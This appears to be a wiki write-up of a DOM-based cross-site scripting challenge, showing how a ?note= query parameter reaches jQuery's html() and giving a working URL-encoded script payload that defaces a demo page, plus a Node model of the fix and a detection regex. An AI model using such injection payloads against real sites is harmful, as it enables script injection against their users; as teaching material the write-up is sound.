Jennings Zhang edited this page Mar 5, 2018 · 8 revisions

Observe the script. The DOM is being changed using the jQuery method html(), which introduces an injection vulnerability. We need to pass malicious code into the variable note. A bit of Googling would have shown you that document.location.search refers to the query string of the URL (everything from the ? onward). This is apparent if you noticed the unusually long link that was originally provided in the post...

[screenshot]

We can inject code by modifying what comes after ?note= in the URL, but whatever we send must be URL-encoded first...

```javascript
// Plain-DOM version: rewrite the page title, the keyword and the second image
document.getElementById('page-title').innerText = 'you are a beautiful person';
document.getElementById('keyword').innerText = 'well ok';
document.getElementsByTagName('img')[1].src = 'https://twlinux.github.io/img/penguins/smol.jpg';
```

Actually, we know this site uses jQuery.

```html
<script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
```

Our payload can be written more simply:

```javascript
// Same changes using jQuery, which the page already loads
$('#page-title').text('you are a beautiful person');
$('#keyword').text('well ok');
$('img:eq(1)').attr('src', 'https://twlinux.github.io/img/penguins/smol.jpg');
```

Minify the script, wrap it in <script>...</script> tags, URL-encode it, then append it to the URL as the note parameter.

https://twlinux.github.io/delet_this?note=%3Cscript%3E%24(%22%23page-title%22).text(%22you%20are%20a%20beautiful%20person%22)%2C%24(%22%23keyword%22).text(%22well%20ok%22)%2C%24(%22img%3Aeq(1)%22).attr(%22src%22%2C%22https%3A%2F%2Ftwlinux.github.io%2Fimg%2Fpenguins%2Fsmol.jpg%22)%3B%3C%2Fscript%3E
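Why this works, and what fixes it: the page reads ?note= from location.search (percent-decoded), then hands it to jQuery's html(), which interprets the string as markup and, unlike the native innerHTML setter, also executes inline <script> elements; using text() instead keeps the same value inert. The following is an added example, not code from this wiki or the challenge site, that models that flow in plain Node with no DOM. The Element class, renderNote, noteHasMarkup and the two query strings are constructed for the example; the attack query is a shortened form of the one above.

```javascript
// Stand-in for the jQuery-wrapped element: html() stores markup verbatim
// (the vulnerable sink), text() stores it escaped (the safe sink).
class Element {
  constructor() { this.innerHTML = ''; }
  html(s) { this.innerHTML = String(s); return this; }
  text(s) { this.innerHTML = escapeHtml(s); return this; }
}

// Minimal HTML escaping, equivalent in effect to what text() does.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// location.search arrives percent-encoded; URLSearchParams decodes it, so
// "?note=%3Cscript%3E..." reaches the sink as "<script>...".
function getNoteParam(search) {
  return new URLSearchParams(search).get('note') || '';
}

// The page's flow: read ?note=, write it into the DOM. `safe` selects the sink.
function renderNote(search, safe) {
  const el = new Element();
  const note = getNoteParam(search);
  return (safe ? el.text(note) : el.html(note)).innerHTML;
}

// Detection helper (e.g. over access logs): does the decoded note carry markup?
function noteHasMarkup(search) {
  return /<\s*\/?[a-z]/i.test(getNoteParam(search));
}

// Constructed samples: a shortened form of the attack query above, and a benign one.
const ATTACK_QUERY = '?note=%3Cscript%3E%24(%22%23page-title%22).text(%22hi%22)%3B%3C%2Fscript%3E';
const BENIGN_QUERY = '?note=Hello%20world';
```

renderNote(ATTACK_QUERY, false) returns the decoded script element unchanged, which is what html() would insert and run; renderNote(ATTACK_QUERY, true) returns it with every angle bracket and quote escaped.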